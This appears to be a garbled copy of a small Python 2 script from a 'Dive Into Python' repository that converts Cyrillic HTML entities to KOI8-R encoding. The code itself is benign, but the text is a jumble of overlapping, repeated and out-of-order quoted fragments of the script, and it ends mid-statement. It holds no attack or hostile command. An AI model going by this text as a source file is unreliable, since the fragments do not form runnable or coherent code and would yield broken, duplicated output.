'&#1099;': '\\xd9', '&#1100;': '\\xd8', '&#1101;': '\\xdc', '&#1102;': '\\xc0', '&#1103;': '\\xd1', '&#1105;': '\\xa3'", "outfilename: outfilename = filename fsock = open(filename) buffer = fsock.read() fsock.close() buffer =", "= charsetPattern.sub('KOI8-R', buffer) return buffer def translateFile(filename, outfilename=None): if not outfilename: outfilename =", "the immediate directory (but not recursively). Safe but pointless to run more than", "directory (but not recursively). Safe but pointless to run more than once on", "not recursively). Safe but pointless to run more than once on the same", "= match.group(0) if unicodeToKOI8R.has_key(unicode): return unicodeToKOI8R[unicode] else: return unicode def translateBuffer(buffer): buffer =", "'\\xf7', '&#1043;': '\\xe7', '&#1044;': '\\xe4', '&#1045;': '\\xe5', '&#1046;': '\\xf6', '&#1047;': '\\xfa', '&#1048;': '\\xe9',", "a file, it converts the file in place; if a directory, it converts", "'&#1052;': '\\xed', '&#1053;': '\\xee', '&#1054;': '\\xef', '&#1055;': '\\xf0', '&#1056;': '\\xf2', '&#1057;': '\\xf3', '&#1058;':", "os.listdir(directoryname)] fileList = filter(filterFunc, fileList) map(translateFile, fileList) if __name__ == \"__main__\": name =", "'&#1058;': '\\xf4', '&#1059;': '\\xf5', '&#1060;': '\\xe6', '&#1061;': '\\xe8', '&#1062;': '\\xe3', '&#1063;': '\\xfe', '&#1064;':", "fileList) map(translateFile, fileList) if __name__ == \"__main__\": name = sys.argv[1] if os.path.isdir(name): translateDirectory(name)", "every HTML file in the immediate directory (but not recursively). Safe but pointless", "iso-8859-1 Unicode-encoded to KOI8-R-encoded This script is used during the build process of", "KOI8-R-encoded This script is used during the build process of the Russian translation", "[os.path.join(directoryname, f) for f in os.listdir(directoryname)] fileList = filter(filterFunc, fileList) map(translateFile, fileList) if", "'wb') fsock.write(buffer) fsock.close() def htmlFilter(filename): return os.path.splitext(filename)[1] == '.html' def translateDirectory(directoryname, filterFunc=htmlFilter): fileList", "match.group(0) if unicodeToKOI8R.has_key(unicode): return unicodeToKOI8R[unicode] else: return unicode def translateBuffer(buffer): buffer = unicodePattern.sub(translateMatch,", "If a file, it converts the file in place; if a directory, it", "'&#1082;': '\\xcb', '&#1083;': '\\xcc', '&#1084;': '\\xcd', '&#1085;': '\\xce', '&#1086;': '\\xcf', '&#1087;': '\\xd0', '&#1088;':", "once on the same file or directory. \"\"\" __author__ = \"<NAME> (<EMAIL>)\" __version__", "from iso-8859-1 Unicode-encoded to KOI8-R-encoded This script is used during the build process", "on the same file or directory. \"\"\" __author__ = \"<NAME> (<EMAIL>)\" __version__ =", "can be either an HTML file or a directory. If a file, it", "unicodePattern.sub(translateMatch, buffer) buffer = charsetPattern.sub('KOI8-R', buffer) return buffer def translateFile(filename, outfilename=None): if not", "during the build process of the Russian translation of \"Dive Into Python\" (http://diveintopython.org/).", "charsetPattern.sub('KOI8-R', buffer) return buffer def translateFile(filename, outfilename=None): if not outfilename: outfilename = filename", "be either an HTML file or a directory. If a file, it converts", "'&#1086;': '\\xcf', '&#1087;': '\\xd0', '&#1088;': '\\xd2', '&#1089;': '\\xd3', '&#1090;': '\\xd4', '&#1091;': '\\xd5', '&#1092;':", "fsock = open(outfilename, 'wb') fsock.write(buffer) fsock.close() def htmlFilter(filename): return os.path.splitext(filename)[1] == '.html' def", "the file in place; if a directory, it converts every HTML file in", "'&#1102;': '\\xc0', '&#1103;': '\\xd1', '&#1105;': '\\xa3' } unicodePattern = re.compile(r'&#[0-9]{4,4};') charsetPattern = re.compile(r'ISO-8859-1',", "the build process of the Russian translation of \"Dive Into Python\" (http://diveintopython.org/). It", "= \"Copyright (c) 2001 <NAME>\" __license__ = \"Python\" import os import sys import", "'&#1071;': '\\xf1', '&#1072;': '\\xc1', '&#1073;': '\\xc2', '&#1074;': '\\xd7', '&#1075;': '\\xc7', '&#1076;': '\\xc4', '&#1077;':", "return unicode def translateBuffer(buffer): buffer = unicodePattern.sub(translateMatch, buffer) buffer = charsetPattern.sub('KOI8-R', buffer) return", "'&#1067;': '\\xf9', '&#1068;': '\\xf8', '&#1069;': '\\xfc', '&#1070;': '\\xe0', '&#1071;': '\\xf1', '&#1072;': '\\xc1', '&#1073;':", "file in place; if a directory, it converts every HTML file in the", "'&#1101;': '\\xdc', '&#1102;': '\\xc0', '&#1103;': '\\xd1', '&#1105;': '\\xa3' } unicodePattern = re.compile(r'&#[0-9]{4,4};') charsetPattern", "'\\xec', '&#1052;': '\\xed', '&#1053;': '\\xee', '&#1054;': '\\xef', '&#1055;': '\\xf0', '&#1056;': '\\xf2', '&#1057;': '\\xf3',", "Unicode-encoded to KOI8-R-encoded This script is used during the build process of the", "<reponame>SlimyMonkey/divePython \"\"\"Convert Cyrillic from iso-8859-1 Unicode-encoded to KOI8-R-encoded This script is used during", "'\\xf5', '&#1060;': '\\xe6', '&#1061;': '\\xe8', '&#1062;': '\\xe3', '&#1063;': '\\xfe', '&#1064;': '\\xfb', '&#1065;': '\\xfd',", "buffer = charsetPattern.sub('KOI8-R', buffer) return buffer def translateFile(filename, outfilename=None): if not outfilename: outfilename", "def translateFile(filename, outfilename=None): if not outfilename: outfilename = filename fsock = open(filename) buffer", "\"\"\"Convert Cyrillic from iso-8859-1 Unicode-encoded to KOI8-R-encoded This script is used during the", "$\" __date__ = \"$Date: 2004/05/05 21:57:19 $\" __copyright__ = \"Copyright (c) 2001 <NAME>\"", "'\\xe8', '&#1062;': '\\xe3', '&#1063;': '\\xfe', '&#1064;': '\\xfb', '&#1065;': '\\xfd', '&#1066;': '\\xff', '&#1067;': '\\xf9',", "'\\xfd', '&#1066;': '\\xff', '&#1067;': '\\xf9', '&#1068;': '\\xf8', '&#1069;': '\\xfc', '&#1070;': '\\xe0', '&#1071;': '\\xf1',", "} unicodePattern = re.compile(r'&#[0-9]{4,4};') charsetPattern = re.compile(r'ISO-8859-1', re.IGNORECASE) def translateMatch(match): unicode = match.group(0)", "'&#1044;': '\\xe4', '&#1045;': '\\xe5', '&#1046;': '\\xf6', '&#1047;': '\\xfa', '&#1048;': '\\xe9', '&#1049;': '\\xea', '&#1050;':", "used during the build process of the Russian translation of \"Dive Into Python\"", "Python\" (http://diveintopython.org/). It takes one argument, which can be either an HTML file", "'\\xfa', '&#1048;': '\\xe9', '&#1049;': '\\xea', '&#1050;': '\\xeb', '&#1051;': '\\xec', '&#1052;': '\\xed', '&#1053;': '\\xee',", "converts the file in place; if a directory, it converts every HTML file", "'&#1054;': '\\xef', '&#1055;': '\\xf0', '&#1056;': '\\xf2', '&#1057;': '\\xf3', '&#1058;': '\\xf4', '&#1059;': '\\xf5', '&#1060;':", "buffer def translateFile(filename, outfilename=None): if not outfilename: outfilename = filename fsock = open(filename)", "argument, which can be either an HTML file or a directory. If a", "sys import re unicodeToKOI8R = { \\ '&#1025;': '\\xb3', '&#1040;': '\\xe1', '&#1041;': '\\xe2',", "'&#1065;': '\\xfd', '&#1066;': '\\xff', '&#1067;': '\\xf9', '&#1068;': '\\xf8', '&#1069;': '\\xfc', '&#1070;': '\\xe0', '&#1071;':", "fsock.close() def htmlFilter(filename): return os.path.splitext(filename)[1] == '.html' def translateDirectory(directoryname, filterFunc=htmlFilter): fileList = [os.path.join(directoryname,", "'&#1094;': '\\xc3', '&#1095;': '\\xde', '&#1096;': '\\xdb', '&#1097;': '\\xdd', '&#1098;': '\\xdf', '&#1099;': '\\xd9', '&#1100;':", "__copyright__ = \"Copyright (c) 2001 <NAME>\" __license__ = \"Python\" import os import sys", "'&#1042;': '\\xf7', '&#1043;': '\\xe7', '&#1044;': '\\xe4', '&#1045;': '\\xe5', '&#1046;': '\\xf6', '&#1047;': '\\xfa', '&#1048;':", "file in the immediate directory (but not recursively). Safe but pointless to run", "'\\xfb', '&#1065;': '\\xfd', '&#1066;': '\\xff', '&#1067;': '\\xf9', '&#1068;': '\\xf8', '&#1069;': '\\xfc', '&#1070;': '\\xe0',", "'&#1068;': '\\xf8', '&#1069;': '\\xfc', '&#1070;': '\\xe0', '&#1071;': '\\xf1', '&#1072;': '\\xc1', '&#1073;': '\\xc2', '&#1074;':", "\"Dive Into Python\" (http://diveintopython.org/). It takes one argument, which can be either an", "'\\xa3' } unicodePattern = re.compile(r'&#[0-9]{4,4};') charsetPattern = re.compile(r'ISO-8859-1', re.IGNORECASE) def translateMatch(match): unicode =", "which can be either an HTML file or a directory. If a file,", "= open(filename) buffer = fsock.read() fsock.close() buffer = translateBuffer(buffer) fsock = open(outfilename, 'wb')", "than once on the same file or directory. \"\"\" __author__ = \"<NAME> (<EMAIL>)\"", "'\\xc3', '&#1095;': '\\xde', '&#1096;': '\\xdb', '&#1097;': '\\xdd', '&#1098;': '\\xdf', '&#1099;': '\\xd9', '&#1100;': '\\xd8',", "process of the Russian translation of \"Dive Into Python\" (http://diveintopython.org/). It takes one", "'\\xc8', '&#1094;': '\\xc3', '&#1095;': '\\xde', '&#1096;': '\\xdb', '&#1097;': '\\xdd', '&#1098;': '\\xdf', '&#1099;': '\\xd9',", "immediate directory (but not recursively). Safe but pointless to run more than once", "def htmlFilter(filename): return os.path.splitext(filename)[1] == '.html' def translateDirectory(directoryname, filterFunc=htmlFilter): fileList = [os.path.join(directoryname, f)", "filter(filterFunc, fileList) map(translateFile, fileList) if __name__ == \"__main__\": name = sys.argv[1] if os.path.isdir(name):", "'\\xcd', '&#1085;': '\\xce', '&#1086;': '\\xcf', '&#1087;': '\\xd0', '&#1088;': '\\xd2', '&#1089;': '\\xd3', '&#1090;': '\\xd4',", "'&#1083;': '\\xcc', '&#1084;': '\\xcd', '&#1085;': '\\xce', '&#1086;': '\\xcf', '&#1087;': '\\xd0', '&#1088;': '\\xd2', '&#1089;':", "re.compile(r'ISO-8859-1', re.IGNORECASE) def translateMatch(match): unicode = match.group(0) if unicodeToKOI8R.has_key(unicode): return unicodeToKOI8R[unicode] else: return", "'\\xde', '&#1096;': '\\xdb', '&#1097;': '\\xdd', '&#1098;': '\\xdf', '&#1099;': '\\xd9', '&#1100;': '\\xd8', '&#1101;': '\\xdc',", "'.html' def translateDirectory(directoryname, filterFunc=htmlFilter): fileList = [os.path.join(directoryname, f) for f in os.listdir(directoryname)] fileList", "of the Russian translation of \"Dive Into Python\" (http://diveintopython.org/). It takes one argument,", "buffer = unicodePattern.sub(translateMatch, buffer) buffer = charsetPattern.sub('KOI8-R', buffer) return buffer def translateFile(filename, outfilename=None):", "'\\xda', '&#1080;': '\\xc9', '&#1081;': '\\xca', '&#1082;': '\\xcb', '&#1083;': '\\xcc', '&#1084;': '\\xcd', '&#1085;': '\\xce',", "'\\xef', '&#1055;': '\\xf0', '&#1056;': '\\xf2', '&#1057;': '\\xf3', '&#1058;': '\\xf4', '&#1059;': '\\xf5', '&#1060;': '\\xe6',", "'&#1064;': '\\xfb', '&#1065;': '\\xfd', '&#1066;': '\\xff', '&#1067;': '\\xf9', '&#1068;': '\\xf8', '&#1069;': '\\xfc', '&#1070;':", "fileList = [os.path.join(directoryname, f) for f in os.listdir(directoryname)] fileList = filter(filterFunc, fileList) map(translateFile,", "21:57:19 $\" __copyright__ = \"Copyright (c) 2001 <NAME>\" __license__ = \"Python\" import os", "'&#1072;': '\\xc1', '&#1073;': '\\xc2', '&#1074;': '\\xd7', '&#1075;': '\\xc7', '&#1076;': '\\xc4', '&#1077;': '\\xc5', '&#1078;':", "'&#1047;': '\\xfa', '&#1048;': '\\xe9', '&#1049;': '\\xea', '&#1050;': '\\xeb', '&#1051;': '\\xec', '&#1052;': '\\xed', '&#1053;':", "for f in os.listdir(directoryname)] fileList = filter(filterFunc, fileList) map(translateFile, fileList) if __name__ ==", "2004/05/05 21:57:19 $\" __copyright__ = \"Copyright (c) 2001 <NAME>\" __license__ = \"Python\" import", "(but not recursively). Safe but pointless to run more than once on the", "'&#1093;': '\\xc8', '&#1094;': '\\xc3', '&#1095;': '\\xde', '&#1096;': '\\xdb', '&#1097;': '\\xdd', '&#1098;': '\\xdf', '&#1099;':", "translateMatch(match): unicode = match.group(0) if unicodeToKOI8R.has_key(unicode): return unicodeToKOI8R[unicode] else: return unicode def translateBuffer(buffer):", "= fsock.read() fsock.close() buffer = translateBuffer(buffer) fsock = open(outfilename, 'wb') fsock.write(buffer) fsock.close() def", "'&#1045;': '\\xe5', '&#1046;': '\\xf6', '&#1047;': '\\xfa', '&#1048;': '\\xe9', '&#1049;': '\\xea', '&#1050;': '\\xeb', '&#1051;':", "__author__ = \"<NAME> (<EMAIL>)\" __version__ = \"$Revision: 1.2 $\" __date__ = \"$Date: 2004/05/05", "It takes one argument, which can be either an HTML file or a", "outfilename=None): if not outfilename: outfilename = filename fsock = open(filename) buffer = fsock.read()", "'\\xdc', '&#1102;': '\\xc0', '&#1103;': '\\xd1', '&#1105;': '\\xa3' } unicodePattern = re.compile(r'&#[0-9]{4,4};') charsetPattern =", "'&#1056;': '\\xf2', '&#1057;': '\\xf3', '&#1058;': '\\xf4', '&#1059;': '\\xf5', '&#1060;': '\\xe6', '&#1061;': '\\xe8', '&#1062;':", "import os import sys import re unicodeToKOI8R = { \\ '&#1025;': '\\xb3', '&#1040;':", "one argument, which can be either an HTML file or a directory. If", "'\\xfe', '&#1064;': '\\xfb', '&#1065;': '\\xfd', '&#1066;': '\\xff', '&#1067;': '\\xf9', '&#1068;': '\\xf8', '&#1069;': '\\xfc',", "script is used during the build process of the Russian translation of \"Dive", "'&#1041;': '\\xe2', '&#1042;': '\\xf7', '&#1043;': '\\xe7', '&#1044;': '\\xe4', '&#1045;': '\\xe5', '&#1046;': '\\xf6', '&#1047;':", "Russian translation of \"Dive Into Python\" (http://diveintopython.org/). It takes one argument, which can", "f in os.listdir(directoryname)] fileList = filter(filterFunc, fileList) map(translateFile, fileList) if __name__ == \"__main__\":", "'&#1057;': '\\xf3', '&#1058;': '\\xf4', '&#1059;': '\\xf5', '&#1060;': '\\xe6', '&#1061;': '\\xe8', '&#1062;': '\\xe3', '&#1063;':", "'&#1070;': '\\xe0', '&#1071;': '\\xf1', '&#1072;': '\\xc1', '&#1073;': '\\xc2', '&#1074;': '\\xd7', '&#1075;': '\\xc7', '&#1076;':", "'\\xc1', '&#1073;': '\\xc2', '&#1074;': '\\xd7', '&#1075;': '\\xc7', '&#1076;': '\\xc4', '&#1077;': '\\xc5', '&#1078;': '\\xd6',", "'&#1099;': '\\xd9', '&#1100;': '\\xd8', '&#1101;': '\\xdc', '&#1102;': '\\xc0', '&#1103;': '\\xd1', '&#1105;': '\\xa3' }", "file or a directory. If a file, it converts the file in place;", "translateFile(filename, outfilename=None): if not outfilename: outfilename = filename fsock = open(filename) buffer =", "in os.listdir(directoryname)] fileList = filter(filterFunc, fileList) map(translateFile, fileList) if __name__ == \"__main__\": name", "'\\xe6', '&#1061;': '\\xe8', '&#1062;': '\\xe3', '&#1063;': '\\xfe', '&#1064;': '\\xfb', '&#1065;': '\\xfd', '&#1066;': '\\xff',", "\"\"\" __author__ = \"<NAME> (<EMAIL>)\" __version__ = \"$Revision: 1.2 $\" __date__ = \"$Date:", "'&#1053;': '\\xee', '&#1054;': '\\xef', '&#1055;': '\\xf0', '&#1056;': '\\xf2', '&#1057;': '\\xf3', '&#1058;': '\\xf4', '&#1059;':", "'\\xf9', '&#1068;': '\\xf8', '&#1069;': '\\xfc', '&#1070;': '\\xe0', '&#1071;': '\\xf1', '&#1072;': '\\xc1', '&#1073;': '\\xc2',", "'\\xc5', '&#1078;': '\\xd6', '&#1079;': '\\xda', '&#1080;': '\\xc9', '&#1081;': '\\xca', '&#1082;': '\\xcb', '&#1083;': '\\xcc',", "\"$Date: 2004/05/05 21:57:19 $\" __copyright__ = \"Copyright (c) 2001 <NAME>\" __license__ = \"Python\"", "buffer) buffer = charsetPattern.sub('KOI8-R', buffer) return buffer def translateFile(filename, outfilename=None): if not outfilename:", "file, it converts the file in place; if a directory, it converts every", "in the immediate directory (but not recursively). Safe but pointless to run more", "directory. \"\"\" __author__ = \"<NAME> (<EMAIL>)\" __version__ = \"$Revision: 1.2 $\" __date__ =", "'&#1040;': '\\xe1', '&#1041;': '\\xe2', '&#1042;': '\\xf7', '&#1043;': '\\xe7', '&#1044;': '\\xe4', '&#1045;': '\\xe5', '&#1046;':", "'\\xe2', '&#1042;': '\\xf7', '&#1043;': '\\xe7', '&#1044;': '\\xe4', '&#1045;': '\\xe5', '&#1046;': '\\xf6', '&#1047;': '\\xfa',", "'\\xee', '&#1054;': '\\xef', '&#1055;': '\\xf0', '&#1056;': '\\xf2', '&#1057;': '\\xf3', '&#1058;': '\\xf4', '&#1059;': '\\xf5',", "'&#1025;': '\\xb3', '&#1040;': '\\xe1', '&#1041;': '\\xe2', '&#1042;': '\\xf7', '&#1043;': '\\xe7', '&#1044;': '\\xe4', '&#1045;':", "it converts the file in place; if a directory, it converts every HTML", "\"<NAME> (<EMAIL>)\" __version__ = \"$Revision: 1.2 $\" __date__ = \"$Date: 2004/05/05 21:57:19 $\"", "htmlFilter(filename): return os.path.splitext(filename)[1] == '.html' def translateDirectory(directoryname, filterFunc=htmlFilter): fileList = [os.path.join(directoryname, f) for", "os.path.splitext(filename)[1] == '.html' def translateDirectory(directoryname, filterFunc=htmlFilter): fileList = [os.path.join(directoryname, f) for f in", "'\\xcc', '&#1084;': '\\xcd', '&#1085;': '\\xce', '&#1086;': '\\xcf', '&#1087;': '\\xd0', '&#1088;': '\\xd2', '&#1089;': '\\xd3',", "buffer) return buffer def translateFile(filename, outfilename=None): if not outfilename: outfilename = filename fsock", "to run more than once on the same file or directory. \"\"\" __author__", "'&#1076;': '\\xc4', '&#1077;': '\\xc5', '&#1078;': '\\xd6', '&#1079;': '\\xda', '&#1080;': '\\xc9', '&#1081;': '\\xca', '&#1082;':", "converts every HTML file in the immediate directory (but not recursively). Safe but", "'&#1088;': '\\xd2', '&#1089;': '\\xd3', '&#1090;': '\\xd4', '&#1091;': '\\xd5', '&#1092;': '\\xc6', '&#1093;': '\\xc8', '&#1094;':", "'\\xea', '&#1050;': '\\xeb', '&#1051;': '\\xec', '&#1052;': '\\xed', '&#1053;': '\\xee', '&#1054;': '\\xef', '&#1055;': '\\xf0',", "def translateBuffer(buffer): buffer = unicodePattern.sub(translateMatch, buffer) buffer = charsetPattern.sub('KOI8-R', buffer) return buffer def", "(http://diveintopython.org/). It takes one argument, which can be either an HTML file or", "return buffer def translateFile(filename, outfilename=None): if not outfilename: outfilename = filename fsock =", "'\\xc9', '&#1081;': '\\xca', '&#1082;': '\\xcb', '&#1083;': '\\xcc', '&#1084;': '\\xcd', '&#1085;': '\\xce', '&#1086;': '\\xcf',", "'&#1103;': '\\xd1', '&#1105;': '\\xa3' } unicodePattern = re.compile(r'&#[0-9]{4,4};') charsetPattern = re.compile(r'ISO-8859-1', re.IGNORECASE) def", "if a directory, it converts every HTML file in the immediate directory (but", "'&#1078;': '\\xd6', '&#1079;': '\\xda', '&#1080;': '\\xc9', '&#1081;': '\\xca', '&#1082;': '\\xcb', '&#1083;': '\\xcc', '&#1084;':", "of \"Dive Into Python\" (http://diveintopython.org/). It takes one argument, which can be either", "def translateMatch(match): unicode = match.group(0) if unicodeToKOI8R.has_key(unicode): return unicodeToKOI8R[unicode] else: return unicode def", "build process of the Russian translation of \"Dive Into Python\" (http://diveintopython.org/). It takes", "'&#1091;': '\\xd5', '&#1092;': '\\xc6', '&#1093;': '\\xc8', '&#1094;': '\\xc3', '&#1095;': '\\xde', '&#1096;': '\\xdb', '&#1097;':", "'\\xce', '&#1086;': '\\xcf', '&#1087;': '\\xd0', '&#1088;': '\\xd2', '&#1089;': '\\xd3', '&#1090;': '\\xd4', '&#1091;': '\\xd5',", "2001 <NAME>\" __license__ = \"Python\" import os import sys import re unicodeToKOI8R =", "__date__ = \"$Date: 2004/05/05 21:57:19 $\" __copyright__ = \"Copyright (c) 2001 <NAME>\" __license__", "'\\xd6', '&#1079;': '\\xda', '&#1080;': '\\xc9', '&#1081;': '\\xca', '&#1082;': '\\xcb', '&#1083;': '\\xcc', '&#1084;': '\\xcd',", "Into Python\" (http://diveintopython.org/). It takes one argument, which can be either an HTML", "'&#1081;': '\\xca', '&#1082;': '\\xcb', '&#1083;': '\\xcc', '&#1084;': '\\xcd', '&#1085;': '\\xce', '&#1086;': '\\xcf', '&#1087;':", "open(filename) buffer = fsock.read() fsock.close() buffer = translateBuffer(buffer) fsock = open(outfilename, 'wb') fsock.write(buffer)", "if unicodeToKOI8R.has_key(unicode): return unicodeToKOI8R[unicode] else: return unicode def translateBuffer(buffer): buffer = unicodePattern.sub(translateMatch, buffer)", "unicodePattern = re.compile(r'&#[0-9]{4,4};') charsetPattern = re.compile(r'ISO-8859-1', re.IGNORECASE) def translateMatch(match): unicode = match.group(0) if", "'&#1096;': '\\xdb', '&#1097;': '\\xdd', '&#1098;': '\\xdf', '&#1099;': '\\xd9', '&#1100;': '\\xd8', '&#1101;': '\\xdc', '&#1102;':", "outfilename = filename fsock = open(filename) buffer = fsock.read() fsock.close() buffer = translateBuffer(buffer)", "is used during the build process of the Russian translation of \"Dive Into", "return os.path.splitext(filename)[1] == '.html' def translateDirectory(directoryname, filterFunc=htmlFilter): fileList = [os.path.join(directoryname, f) for f", "'&#1069;': '\\xfc', '&#1070;': '\\xe0', '&#1071;': '\\xf1', '&#1072;': '\\xc1', '&#1073;': '\\xc2', '&#1074;': '\\xd7', '&#1075;':", "same file or directory. \"\"\" __author__ = \"<NAME> (<EMAIL>)\" __version__ = \"$Revision: 1.2", "'\\xe0', '&#1071;': '\\xf1', '&#1072;': '\\xc1', '&#1073;': '\\xc2', '&#1074;': '\\xd7', '&#1075;': '\\xc7', '&#1076;': '\\xc4',", "'&#1075;': '\\xc7', '&#1076;': '\\xc4', '&#1077;': '\\xc5', '&#1078;': '\\xd6', '&#1079;': '\\xda', '&#1080;': '\\xc9', '&#1081;':", "'&#1105;': '\\xa3' } unicodePattern = re.compile(r'&#[0-9]{4,4};') charsetPattern = re.compile(r'ISO-8859-1', re.IGNORECASE) def translateMatch(match): unicode", "<NAME>\" __license__ = \"Python\" import os import sys import re unicodeToKOI8R = {", "= \"$Revision: 1.2 $\" __date__ = \"$Date: 2004/05/05 21:57:19 $\" __copyright__ = \"Copyright", "'\\xe5', '&#1046;': '\\xf6', '&#1047;': '\\xfa', '&#1048;': '\\xe9', '&#1049;': '\\xea', '&#1050;': '\\xeb', '&#1051;': '\\xec',", "'\\xd0', '&#1088;': '\\xd2', '&#1089;': '\\xd3', '&#1090;': '\\xd4', '&#1091;': '\\xd5', '&#1092;': '\\xc6', '&#1093;': '\\xc8',", "= re.compile(r'&#[0-9]{4,4};') charsetPattern = re.compile(r'ISO-8859-1', re.IGNORECASE) def translateMatch(match): unicode = match.group(0) if unicodeToKOI8R.has_key(unicode):", "'\\xc0', '&#1103;': '\\xd1', '&#1105;': '\\xa3' } unicodePattern = re.compile(r'&#[0-9]{4,4};') charsetPattern = re.compile(r'ISO-8859-1', re.IGNORECASE)", "unicodeToKOI8R[unicode] else: return unicode def translateBuffer(buffer): buffer = unicodePattern.sub(translateMatch, buffer) buffer = charsetPattern.sub('KOI8-R',", "'\\xe3', '&#1063;': '\\xfe', '&#1064;': '\\xfb', '&#1065;': '\\xfd', '&#1066;': '\\xff', '&#1067;': '\\xf9', '&#1068;': '\\xf8',", "place; if a directory, it converts every HTML file in the immediate directory", "'&#1060;': '\\xe6', '&#1061;': '\\xe8', '&#1062;': '\\xe3', '&#1063;': '\\xfe', '&#1064;': '\\xfb', '&#1065;': '\\xfd', '&#1066;':", "re.compile(r'&#[0-9]{4,4};') charsetPattern = re.compile(r'ISO-8859-1', re.IGNORECASE) def translateMatch(match): unicode = match.group(0) if unicodeToKOI8R.has_key(unicode): return", "directory, it converts every HTML file in the immediate directory (but not recursively).", "'\\xf3', '&#1058;': '\\xf4', '&#1059;': '\\xf5', '&#1060;': '\\xe6', '&#1061;': '\\xe8', '&#1062;': '\\xe3', '&#1063;': '\\xfe',", "or a directory. If a file, it converts the file in place; if", "= unicodePattern.sub(translateMatch, buffer) buffer = charsetPattern.sub('KOI8-R', buffer) return buffer def translateFile(filename, outfilename=None): if", "Safe but pointless to run more than once on the same file or", "'&#1100;': '\\xd8', '&#1101;': '\\xdc', '&#1102;': '\\xc0', '&#1103;': '\\xd1', '&#1105;': '\\xa3' } unicodePattern =", "= \"<NAME> (<EMAIL>)\" __version__ = \"$Revision: 1.2 $\" __date__ = \"$Date: 2004/05/05 21:57:19", "'&#1079;': '\\xda', '&#1080;': '\\xc9', '&#1081;': '\\xca', '&#1082;': '\\xcb', '&#1083;': '\\xcc', '&#1084;': '\\xcd', '&#1085;':", "(<EMAIL>)\" __version__ = \"$Revision: 1.2 $\" __date__ = \"$Date: 2004/05/05 21:57:19 $\" __copyright__", "'\\xc4', '&#1077;': '\\xc5', '&#1078;': '\\xd6', '&#1079;': '\\xda', '&#1080;': '\\xc9', '&#1081;': '\\xca', '&#1082;': '\\xcb',", "{ \\ '&#1025;': '\\xb3', '&#1040;': '\\xe1', '&#1041;': '\\xe2', '&#1042;': '\\xf7', '&#1043;': '\\xe7', '&#1044;':", "'&#1080;': '\\xc9', '&#1081;': '\\xca', '&#1082;': '\\xcb', '&#1083;': '\\xcc', '&#1084;': '\\xcd', '&#1085;': '\\xce', '&#1086;':", "= { \\ '&#1025;': '\\xb3', '&#1040;': '\\xe1', '&#1041;': '\\xe2', '&#1042;': '\\xf7', '&#1043;': '\\xe7',", "fsock.read() fsock.close() buffer = translateBuffer(buffer) fsock = open(outfilename, 'wb') fsock.write(buffer) fsock.close() def htmlFilter(filename):", "but pointless to run more than once on the same file or directory.", "= \"$Date: 2004/05/05 21:57:19 $\" __copyright__ = \"Copyright (c) 2001 <NAME>\" __license__ =", "run more than once on the same file or directory. \"\"\" __author__ =", "import sys import re unicodeToKOI8R = { \\ '&#1025;': '\\xb3', '&#1040;': '\\xe1', '&#1041;':", "a directory. If a file, it converts the file in place; if a", "unicodeToKOI8R.has_key(unicode): return unicodeToKOI8R[unicode] else: return unicode def translateBuffer(buffer): buffer = unicodePattern.sub(translateMatch, buffer) buffer", "'&#1063;': '\\xfe', '&#1064;': '\\xfb', '&#1065;': '\\xfd', '&#1066;': '\\xff', '&#1067;': '\\xf9', '&#1068;': '\\xf8', '&#1069;':", "pointless to run more than once on the same file or directory. \"\"\"", "buffer = translateBuffer(buffer) fsock = open(outfilename, 'wb') fsock.write(buffer) fsock.close() def htmlFilter(filename): return os.path.splitext(filename)[1]", "= \"Python\" import os import sys import re unicodeToKOI8R = { \\ '&#1025;':", "__version__ = \"$Revision: 1.2 $\" __date__ = \"$Date: 2004/05/05 21:57:19 $\" __copyright__ =", "'&#1049;': '\\xea', '&#1050;': '\\xeb', '&#1051;': '\\xec', '&#1052;': '\\xed', '&#1053;': '\\xee', '&#1054;': '\\xef', '&#1055;':", "'\\xd3', '&#1090;': '\\xd4', '&#1091;': '\\xd5', '&#1092;': '\\xc6', '&#1093;': '\\xc8', '&#1094;': '\\xc3', '&#1095;': '\\xde',", "HTML file in the immediate directory (but not recursively). Safe but pointless to", "'&#1050;': '\\xeb', '&#1051;': '\\xec', '&#1052;': '\\xed', '&#1053;': '\\xee', '&#1054;': '\\xef', '&#1055;': '\\xf0', '&#1056;':", "'\\xb3', '&#1040;': '\\xe1', '&#1041;': '\\xe2', '&#1042;': '\\xf7', '&#1043;': '\\xe7', '&#1044;': '\\xe4', '&#1045;': '\\xe5',", "buffer = fsock.read() fsock.close() buffer = translateBuffer(buffer) fsock = open(outfilename, 'wb') fsock.write(buffer) fsock.close()", "\"Copyright (c) 2001 <NAME>\" __license__ = \"Python\" import os import sys import re", "the Russian translation of \"Dive Into Python\" (http://diveintopython.org/). It takes one argument, which", "in place; if a directory, it converts every HTML file in the immediate", "'&#1074;': '\\xd7', '&#1075;': '\\xc7', '&#1076;': '\\xc4', '&#1077;': '\\xc5', '&#1078;': '\\xd6', '&#1079;': '\\xda', '&#1080;':", "fsock.write(buffer) fsock.close() def htmlFilter(filename): return os.path.splitext(filename)[1] == '.html' def translateDirectory(directoryname, filterFunc=htmlFilter): fileList =", "'\\xff', '&#1067;': '\\xf9', '&#1068;': '\\xf8', '&#1069;': '\\xfc', '&#1070;': '\\xe0', '&#1071;': '\\xf1', '&#1072;': '\\xc1',", "'\\xd8', '&#1101;': '\\xdc', '&#1102;': '\\xc0', '&#1103;': '\\xd1', '&#1105;': '\\xa3' } unicodePattern = re.compile(r'&#[0-9]{4,4};')", "Cyrillic from iso-8859-1 Unicode-encoded to KOI8-R-encoded This script is used during the build", "This script is used during the build process of the Russian translation of", "import re unicodeToKOI8R = { \\ '&#1025;': '\\xb3', '&#1040;': '\\xe1', '&#1041;': '\\xe2', '&#1042;':", "takes one argument, which can be either an HTML file or a directory.", "an HTML file or a directory. If a file, it converts the file", "1.2 $\" __date__ = \"$Date: 2004/05/05 21:57:19 $\" __copyright__ = \"Copyright (c) 2001", "if not outfilename: outfilename = filename fsock = open(filename) buffer = fsock.read() fsock.close()", "'&#1087;': '\\xd0', '&#1088;': '\\xd2', '&#1089;': '\\xd3', '&#1090;': '\\xd4', '&#1091;': '\\xd5', '&#1092;': '\\xc6', '&#1093;':", "'\\xd5', '&#1092;': '\\xc6', '&#1093;': '\\xc8', '&#1094;': '\\xc3', '&#1095;': '\\xde', '&#1096;': '\\xdb', '&#1097;': '\\xdd',", "'&#1084;': '\\xcd', '&#1085;': '\\xce', '&#1086;': '\\xcf', '&#1087;': '\\xd0', '&#1088;': '\\xd2', '&#1089;': '\\xd3', '&#1090;':", "'\\xd4', '&#1091;': '\\xd5', '&#1092;': '\\xc6', '&#1093;': '\\xc8', '&#1094;': '\\xc3', '&#1095;': '\\xde', '&#1096;': '\\xdb',", "= 